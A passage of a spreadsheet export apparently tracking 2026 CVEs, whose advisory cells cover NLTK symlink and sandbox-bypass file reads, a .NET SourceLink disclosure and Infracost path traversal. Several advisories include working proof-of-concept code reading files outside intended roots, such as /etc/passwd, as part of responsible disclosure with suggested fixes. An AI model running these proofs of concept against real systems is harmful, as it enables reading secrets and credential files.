    with open(f) as infile:   # builtin open(), no pathsec involvement
        header = infile.read()
    ...
```

`f` arrives via `_list_header_files()` / `_list_morph_files_by()`, both of which call:

```python
f.replace("morph.xml", "header.xml")
```

on the result of `self.abspath(...)` or `self.abspaths(...)`. `FileSystemPathPointer` subclasses `str`, so `.replace()` returns a plain Python string, silently discarding the `PathPointer` wrapper. That plain string is handed straight to builtin `open()`.

This is a more severe variant of the same CWE-59 class already fixed elsewhere in this codebase (`CorpusReader.open()`, `NKJPCorpusReader.add_root()`, and the recent `FramenetCorpusReader` fix): those route file access through `nltk.pathsec.validate_path()`, at minimum the global, non-scoped check, before opening. Here, converting the `PathPointer` to a plain string before calling `open()` skips `pathsec` completely, not just the corpus-root-scoped check, so the symlink target does not even need to land under a registered `nltk.data.path` root.

Plain literal `../` traversal in the fileid is still blocked by `FileSystemPathPointer.join()`, so this is specifically the symlink variant, not a regression of the older, simpler traversal class.

## Proof of concept

Constructed the normal, documented way, `fileids` as a regex over file paths, so the reader auto-discovers whatever `.xml` files exist in its root with no special knowledge of the planted symlink.

```python
import os
import tempfile

from nltk.corpus.reader.ipipan import IPIPANCorpusReader

root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "ipipan")
os.makedirs(corpus_root)

with open(os.path.join(corpus_root, "real_morph.xml"), "w") as f:
    f.write("&lt;channel&gt;legit&lt;/channel&gt;")

secret_dir = os.path.join(root, "outside_ipipan_root")
os.makedirs(secret_dir)
secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
    f.write("&lt;channel&gt;TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT&lt;/channel&gt;")

os.symlink(secret_path, os.path.join(corpus_root, "evil_link.xml"))

reader = IPIPANCorpusReader(corpus_root, r".*\.xml")
print("Auto-discovered fileids:", sorted(reader.fileids()))

result = reader.channels(fileids=["evil_link.xml"])
print(result)
```

Actual output when run against current `develop`:

```
Auto-discovered fileids: ['evil_link.xml', 'real_morph.xml']
['TOP-SECRET-CHANNEL-DATA-FROM-OUTSIDE-CORPUS-ROOT']
```

That content was read from `secret_path`, a file entirely outside `corpus_root`. No exception raised anywhere. The planted symlink even surfaces naturally in the reader's own `fileids()` listing, exactly as a real file would.

Verified separately that literal `../` traversal in the fileid is still rejected (`ValueError: Traversal blocked`), confirming this is specifically the symlink gap, not a broader regression.

## Why this is in scope

- No malicious file for a victim to open, no special user interaction. Just a tampered or shared corpus directory (`SECURITY.md` names "shared environments... multi-tenant pipelines" as the project's own stated threat model) plus a completely normal API call.
- Core corpus-reader code, reached through plain `import nltk` and documented, programmatic usage (`words()`, `sents()`, `channels()`, etc.), not a demo or GUI tool.
- Same reader category, and same CWE-59 mechanism, already treated as CVE-worthy twice in this codebase for `FramenetCorpusReader` and `NKJPCorpusReader`.
- Not a bypass of a claimed fix. `ipipan.py` has never had security hardening applied, and has no dedicated test coverage at all.

## CVSS v3.1

- **AV:L, AC:L**: exploitation is local filesystem symlink placement, then immediate and deterministic once triggered.
- **PR:L**: the attacker needs some pre-existing ability to plant a symlink somewhere reachable, not zero privilege, but not elevated either.
- **UI:N**: fires during routine, automated corpus processing, no separate victim action.
- **S:U**: stays within the same process's existing privileges.
- **C:H, I:N, A:N**: arbitrary file read only, no write, no crash.

## Suggested fix

Route `_get_tag()` through `nltk.pathsec.validate_path()` with the corpus root as `required_root`, or through `CorpusReader.open()`, instead of converting the `PathPointer` to a plain string and calling builtin `open()` directly. The same fix pattern already applied to `FramenetCorpusReader` and `NKJPCorpusReader` applies directly here.</t></is></c><c r="T1572" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62383</t></is></c></row><row r="1573"><c r="A1573" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1573" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1573" s="5" t="inlineStr"><is><t>CVE-2026-62384</t></is></c><c r="D1573" s="5" t="inlineStr" /><c r="E1573" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1573" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1573" s="5" t="inlineStr" /><c r="H1573" s="5" t="n"><v>0.006</v></c><c r="I1573" s="5" t="inlineStr" /><c r="J1573" s="5" t="inlineStr" /><c r="K1573" s="5" t="inlineStr" /><c r="L1573" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1573" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N1573" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1573" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1573" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1573" s="5" t="inlineStr" /><c r="R1573" s="5" t="inlineStr" /><c r="S1573" s="5" t="inlineStr"><is><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is></c><c r="T1573" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62384</t></is></c></row><row r="1574"><c r="A1574" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1574" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1574" s="5" t="inlineStr"><is><t>CVE-2026-62385</t></is></c><c r="D1574" s="5" t="inlineStr" /><c r="E1574" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1574" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1574" s="5" t="inlineStr" /><c r="H1574" s="5" t="n"><v>0.004</v></c><c r="I1574" s="5" t="inlineStr" /><c r="J1574" s="5" t="inlineStr" /><c r="K1574" s="5" t="inlineStr" /><c r="L1574" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1574" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1574" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1574" s="5" t="inlineStr" /><c r="R1574" s="5" t="inlineStr" /><c r="S1574" s="5" t="inlineStr"><is><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is></c><c r="T1574" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62385</t></is></c></row><row r="1575"><c r="A1575" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1575" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1575" s="5" t="inlineStr"><is><t>CVE-2026-62815</t></is></c><c r="D1575" s="5" t="inlineStr" /><c r="E1575" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1575" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1575" s="5" t="inlineStr" /><c r="H1575" s="5" t="n"><v>0.012</v></c><c r="I1575" s="5" t="inlineStr" /><c r="J1575" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K1575" s="5" t="inlineStr" /><c r="L1575" s="5" t="inlineStr"><is><t>NuGet:Microsoft.Native.Quic.MsQuic.OpenSSL, NuGet:Microsoft.Native.Quic.MsQuic.Schannel</t></is></c><c r="M1575" s="5" t="inlineStr"><is><t>2.4.19, 2.5.10</t></is></c><c r="N1575" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1575" s="5" t="inlineStr" /><c r="R1575" s="5" t="inlineStr" /><c r="S1575" s="5" t="inlineStr"><is><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is></c><c r="T1575" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t></is></c></row><row r="1576"><c r="A1576" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1576" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1576" s="5" t="inlineStr"><is><t>CVE-2026-62900</t></is></c><c r="D1576" s="5" t="inlineStr" /><c r="E1576" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1576" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1576" s="5" t="inlineStr" /><c r="H1576" s="5" t="n"><v>0.005</v></c><c r="I1576" s="5" t="inlineStr" /><c r="J1576" s="5" t="inlineStr" /><c r="K1576" s="5" t="inlineStr" /><c r="L1576" s="5" t="inlineStr"><is><t>NuGet:Microsoft.Build.Tasks.Git, NuGet:Microsoft.SourceLink.AzureRepos.Git</t></is></c><c r="M1576" s="5" t="inlineStr"><is><t>10.0.111, 10.0.303</t></is></c><c r="N1576" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1576" s="5" t="inlineStr" /><c r="R1576" s="5" t="inlineStr" /><c r="S1576" s="5" t="inlineStr"><is><t>## Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in Microsoft.Build.Tasks.Git and Microsoft.SourceLink.AzureRepos.Git. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.

Improper removal of sensitive information before storage or transfer in .NET allows an unauthorized attacker to disclose information over a network.

## Announcement

Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/**TBD**

## CVSS Details

- **Version:** 3.1
- **Severity:** Medium
- **Score:** 5.9
- **Vector:** `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C`
- **Weakness:** CWE-212: Improper Removal of Sensitive Information Before Storage or Transfer

## Affected Platforms

- **Platforms:** Windows, Linux, macOS
- **Architectures:** All

## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below

### &lt;a name="published-nuget-packages"&gt;&lt;/a&gt;Published NuGet packages
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.Build.Tasks.Git](https://www.nuget.org/packages/Microsoft.Build.Tasks.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | = 8.0.0 | No patched NuGet version; update to a fixed .NET 8 SDK
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.102, &lt;= 10.0.110 | 10.0.111
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.200, &lt;= 10.0.204 | No patched NuGet version; the 10.0.2xx SDK feature band is no longer serviced
[Microsoft.SourceLink.AzureRepos.Git](https://www.nuget.org/packages/Microsoft.SourceLink.AzureRepos.Git) | &gt;= 10.0.300, &lt;= 10.0.301 | 10.0.303

The affected packages used by .NET 8 and .NET 9 SDKs are built with SDK-specific prerelease versions that aren't published as stable NuGet packages. Update to SDK 8.0.130 or 8.0.424, SDK 9.0.120 or 9.0.317, or SDK 10.0.111 or 10.0.303 to receive the fix.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[CVE-2026-62900](https://www.cve.org/CVERecord?id=CVE-2026-62900)

### Acknowledgements

Ivan Demchuk

### Revisions

V1.0 (08/11/2026): Advisory published.</t></is></c><c r="T1576" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62900</t></is></c></row><row r="1577"><c r="A1577" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1577" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1577" s="5" t="inlineStr"><is><t>CVE-2026-63312</t></is></c><c r="D1577" s="5" t="inlineStr" /><c r="E1577" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1577" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1577" s="5" t="inlineStr" /><c r="H1577" s="5" t="n"><v>0.006</v></c><c r="I1577" s="5" t="inlineStr" /><c r="J1577" s="5" t="inlineStr" /><c r="K1577" s="5" t="inlineStr" /><c r="L1577" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1577" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1577" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1577" s="5" t="inlineStr" /><c r="R1577" s="5" t="inlineStr" /><c r="S1577" s="5" t="inlineStr"><is><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is></c><c r="T1577" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63312</t></is></c></row><row r="1578"><c r="A1578" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1578" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1578" s="5" t="inlineStr"><is><t>CVE-2026-65915</t></is></c><c r="D1578" s="5" t="inlineStr" /><c r="E1578" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1578" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1578" s="5" t="inlineStr" /><c r="H1578" s="5" t="n"><v>0.004</v></c><c r="I1578" s="5" t="inlineStr" /><c r="J1578" s="5" t="inlineStr" /><c r="K1578" s="5" t="inlineStr" /><c r="L1578" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1578" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1578" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1578" s="5" t="inlineStr" /><c r="R1578" s="5" t="inlineStr" /><c r="S1578" s="5" t="inlineStr"><is><t>### Summary

There's a logic bug in `FileSystemPathPointer.open()` inside `nltk/data.py`
that makes the sandbox check permanently inert. The guard condition is always
`False` — meaning any file the process can read is accessible by passing a
`file://` URL to `nltk.data.load()`.

---

### Details

In `nltk/data.py`, `FileSystemPathPointer.open()` was patched at some point
with a comment saying "SECURITY PATCH ENFORCING SANDBOX", but the check
doesn't work:
```python
def open(self, encoding=None):
    path = os.path.normpath(self._path)

    # Block raw absolute reads such as "/" "C:\\Windows" etc.
    if os.path.isabs(path) and path != os.path.normpath(self._path):
        raise ValueError(f"Direct absolute file access blocked: {path}")

    stream = open(self._path, "rb")
```

`path` is set to `os.path.normpath(self._path)` on line 1, then compared
against `os.path.normpath(self._path)` again in the condition. They are
always equal. The `ValueError` never fires.

On top of that, `__init__` already calls `os.path.abspath()` before storing
`self._path`, so it's normalized before `open()` is even called. Running
`normpath` on it again changes nothing.

The `stream = open(self._path, "rb")` line is always reached regardless of
what path was passed in.

---

### PoC

Tested on Python 3.11, NLTK 3.9.1, Ubuntu 22.04.
```python
import nltk
from nltk.data import FileSystemPathPointer

# direct construction
ptr = FileSystemPathPointer("/etc/passwd")
with ptr.open() as f:
    print(f.read(300))

# via load() using file:// URL
data = nltk.data.load("file:///etc/passwd", format="raw")
print(data[:300])
```

Both print file contents. No exception is raised.

---

### Impact

Any app that lets users influence the string passed to `nltk.data.load()` or
`nltk.data.find()` is exposed — web APIs, notebook servers, multi-tenant
pipelines. An attacker can read any file the process user has access to:
`/etc/passwd`, `.env` files, private keys, `~/.aws/credentials`, etc.

## Suggested Fix

**File:** `nltk/data.py` — `FileSystemPathPointer.open()` (lines 378–390)

### What's wrong

Line 387 compares `normpath(self._path)` against itself — always equal,
so the `ValueError` never fires. The check is dead code.
`__init__` already calls `abspath()` on construction, so re-running
`normpath` inside `open()` changes nothing either.

---

### Fix

Validate against the actual list of permitted data directories instead:
```python
def open(self, encoding=None):
    import nltk.data as _d
    allowed = [os.path.abspath(p) for p in _d.path if p]
    if allowed and not any(
        os.path.commonpath([self._path, r]) == r for r in allowed
    ):
        raise ValueError(
            f"Access outside nltk_data blocked: {self._path!r}"
        )
    stream = open(self._path, "rb")
    if encoding is not None:
        stream = SeekableUnicodeStreamReader(stream, encoding)
    return stream
```

---

### Why `commonpath` not `startswith`

`startswith` is bypassable by a path that shares a prefix:
```
/tmp/nltk_data_evil".startswith("/tmp/nltk_data") → True  ✗
commonpath(["/tmp/nltk_data_evil", "/tmp/nltk_data"]) → "/tmp"  ✓
```

---

### Diff
```diff
-    path = os.path.normpath(self._path)
-    if os.path.isabs(path) and path != os.path.normpath(self._path):
-        raise ValueError(f"Direct absolute file access blocked: {path}")
-
+    import nltk.data as _d
+    allowed = [os.path.abspath(p) for p in _d.path if p]
+    if allowed and not any(
+        os.path.commonpath([self._path, r]) == r for r in allowed
+    ):
+        raise ValueError(f"Access outside nltk_data blocked: {self._path!r}")
     stream = open(self._path, "rb")
```</t></is></c><c r="T1578" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65915</t></is></c></row><row r="1579"><c r="A1579" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1579" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1579" s="5" t="inlineStr"><is><t>CVE-2026-69222</t></is></c><c r="D1579" s="5" t="inlineStr" /><c r="E1579" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1579" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1579" s="5" t="inlineStr" /><c r="H1579" s="5" t="n"><v>0.004</v></c><c r="I1579" s="5" t="inlineStr" /><c r="J1579" s="5" t="inlineStr" /><c r="K1579" s="5" t="inlineStr" /><c r="L1579" s="5" t="inlineStr"><is><t>npm:liquidjs</t></is></c><c r="M1579" s="5" t="inlineStr"><is><t>10.27.2</t></is></c><c r="N1579" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1579" s="5" t="inlineStr" /><c r="R1579" s="5" t="inlineStr" /><c r="S1579" s="5" t="inlineStr"><is><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is></c><c r="T1579" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t></is></c></row><row r="1580"><c r="A1580" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1580" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1580" s="5" t="inlineStr"><is><t>CVE-2026-70613</t></is></c><c r="D1580" s="5" t="inlineStr" /><c r="E1580" s="5" t="inlineStr" /><c r="F1580" s="5" t="inlineStr" /><c r="G1580" s="5" t="inlineStr" /><c r="H1580" s="5" t="inlineStr" /><c r="I1580" s="5" t="inlineStr" /><c r="J1580" s="5" t="inlineStr" /><c r="K1580" s="5" t="inlineStr" /><c r="L1580" s="5" t="inlineStr" /><c r="M1580" s="5" t="inlineStr" /><c r="N1580" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1580" s="5" t="inlineStr" /><c r="R1580" s="5" t="inlineStr" /><c r="S1580" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1580" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70613</t></is></c></row><row r="1581"><c r="A1581" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1581" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1581" s="5" t="inlineStr"><is><t>CVE-2026-70614</t></is></c><c r="D1581" s="5" t="inlineStr" /><c r="E1581" s="5" t="inlineStr" /><c r="F1581" s="5" t="inlineStr" /><c r="G1581" s="5" t="inlineStr" /><c r="H1581" s="5" t="inlineStr" /><c r="I1581" s="5" t="inlineStr" /><c r="J1581" s="5" t="inlineStr" /><c r="K1581" s="5" t="inlineStr" /><c r="L1581" s="5" t="inlineStr" /><c r="M1581" s="5" t="inlineStr" /><c r="N1581" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1581" s="5" t="inlineStr" /><c r="R1581" s="5" t="inlineStr" /><c r="S1581" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1581" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70614</t></is></c></row><row r="1582"><c r="A1582" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1582" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1582" s="5" t="inlineStr"><is><t>CVE-2026-70626</t></is></c><c r="D1582" s="5" t="inlineStr" /><c r="E1582" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1582" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1582" s="5" t="inlineStr" /><c r="H1582" s="5" t="n"><v>0.002</v></c><c r="I1582" s="5" t="inlineStr" /><c r="J1582" s="5" t="inlineStr" /><c r="K1582" s="5" t="inlineStr" /><c r="L1582" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1582" s="5" t="inlineStr"><is><t>3.9.4</t></is></c><c r="N1582" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1582" s="5" t="inlineStr" /><c r="R1582" s="5" t="inlineStr" /><c r="S1582" s="5" t="inlineStr"><is><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is></c><c r="T1582" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70626</t></is></c></row><row r="1583"><c r="A1583" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1583" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1583" s="5" t="inlineStr"><is><t>CVE-2026-71493</t></is></c><c r="D1583" s="5" t="inlineStr" /><c r="E1583" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1583" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1583" s="5" t="inlineStr" /><c r="H1583" s="5" t="n"><v>0.004</v></c><c r="I1583" s="5" t="inlineStr" /><c r="J1583" s="5" t="inlineStr" /><c r="K1583" s="5" t="inlineStr" /><c r="L1583" s="5" t="inlineStr"><is><t>Go:github.com/infracost/infracost</t></is></c><c r="M1583" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N1583" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1583" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1583" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1583" s="5" t="inlineStr" /><c r="R1583" s="5" t="inlineStr" /><c r="S1583" s="5" t="inlineStr"><is><t>### Impact

Path traversal via link following in the Infracost config-template parser. The `readFile`, `pathExists`, `isDir`, and `matchPaths` template functions confined repo-supplied paths with a lexical `filepath.Rel` check plus a leaf-only `os.Lstat`:

```
{{ readFile "evil/file" }}
```

With an intermediate directory symlink committed in the repo (`evil -&gt; /`), the path is lexically clean and the leaf is a regular file, so both checks pass, but `os.ReadFile` follows the symlink and reads outside the checkout. The contents are rendered into the generated config and surfaced via the Infracost dashboard and PR comment, so anyone who can open a pull request can read files off the runner.

Affects `infracost` up to and including `v0.10.44`. Successful exploitation reads any file the CLI process can reach on the runner. Impact depends on what the run exposes: under `on: pull_request` (the configuration in Infracost's documentation) fork pull requests run without secrets and with a read-only token, so exposure is limited. If Infracost runs under `pull_request_target`, or is triggered by a same-repository pull request, the read reaches the repository's secrets, enabling secret theft. The patch confines all four functions regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3586](https://github.com/infracost/infracost/pull/3586)) by routing all four functions through `security.IsPathAllowed`, which resolves symlinks anywhere in the path before a segment-aware containment check. The same fix landed in [config#14](https://github.com/infracost/config/pull/14) and [parser#144](https://github.com/infracost/parser/pull/144).
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: run Infracost under `on: pull_request` rather than `pull_request_target`, and keep fork pull requests from receiving secrets (the defaults).</t></is></c><c r="T1583" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71493</t></is></c></row><row r="1584"><c r="A1584" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1584" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1584" s="5" t="inlineStr"><is><t>CVE-2026-71494</t></is></c><c r="D1584" s="5" t="inlineStr" /><c r="E1584" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1584" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1584" s="5" t="inlineStr" /><c r="H1584" s="5" t="n"><v>0.004</v></c><c r="I1584" s="5" t="inlineStr" /><c r="J1584" s="5" t="inlineStr" /><c r="K1584" s="5" t="inlineStr" /><c r="L1584" s="5" t="inlineStr"><is><t>Go:github.com/infracost/infracost</t></is></c><c r="M1584" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N1584" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1584" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1584" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1584" s="5" t="inlineStr" /><c r="R1584" s="5" t="inlineStr" /><c r="S1584" s="5" t="inlineStr"><is><t>### Impact

Sensitive information exposure in the Infracost Terraform Cloud/Enterprise integration. Several code paths attached a configured secret token to a request whose host was taken straight from the scanned Terraform, with no check that the host was the trusted endpoint. 

The condition that matters is whether a Terraform Cloud/Enterprise (or registry) token is present in the run: if one is, the injected hostname can disclose it. Impact therefore depends on the trigger. Under `on: pull_request` (the only configuration in Infracost's documentation) fork pull requests run without secrets, so no token is present. It only reaches token disclosure under `pull_request_target`, a same-repository pull request, or another CI setup that provides the token alongside untrusted Terraform, and exploiting an untrusted fork pull request also typically needs a maintainer to approve the workflow run. The patch scopes the token to the trusted host regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3590](https://github.com/infracost/infracost/pull/3590)) by attaching a token only when the destination host matches the configured trusted host; otherwise Infracost refuses to send it and skips remote variable loading
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: use `on: pull_request` rather than `pull_request_target`, pin `organization`, `workspace`, and `host` in Infracost config so the `.tf` hostname is ignored, and keep Terraform Cloud and registry tokens out of runs that process untrusted pull request content.</t></is></c><c r="T1584" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71494</t></is></c></row><row r="1585"><c r="A1585" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1585" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1585" s="5" t="inlineStr"><is><t>CVE-2026-72789</t></is></c><c r="D1585" s="5" t="inlineStr" /><c r="E1585" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1585" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1585" s="5" t="inlineStr" /><c r="H1585" s="5" t="n"><v>0.003</v></c><c r="I1585" s="5" t="inlineStr" /><c r="J1585" s="5" t="inlineStr" /><c r="K1585" s="5" t="inlineStr" /><c r="L1585" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1585" s="5" t="inlineStr"><is><t>0.0.0-20260726020813-a25c2dd06aae</t></is></c><c r="N1585" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1585" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1585" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1585" s="5" t="inlineStr" /><c r="R1585" s="5" t="inlineStr" /><c r="S1585" s="5" t="inlineStr"><is><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is></c><c r="T1585" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72789</t></is></c></row><row r="1586"><c r="A1586" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1586" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1586" s="5" t="inlineStr"><is><t>CVE-2026-72790</t></is></c><c r="D1586" s="5" t="inlineStr" /><c r="E1586" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1586" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1586" s="5" t="inlineStr" /><c r="H1586" s="5" t="n"><v>0.002</v></c><c r="I1586" s="5" t="inlineStr" /><c r="J1586" s="5" t="inlineStr" /><c r="K1586" s="5" t="inlineStr" /><c r="L1586" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1586" s="5" t="inlineStr"><is><t>0.0.0-20260726005141-9edb321eb451</t></is></c><c r="N1586" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1586" 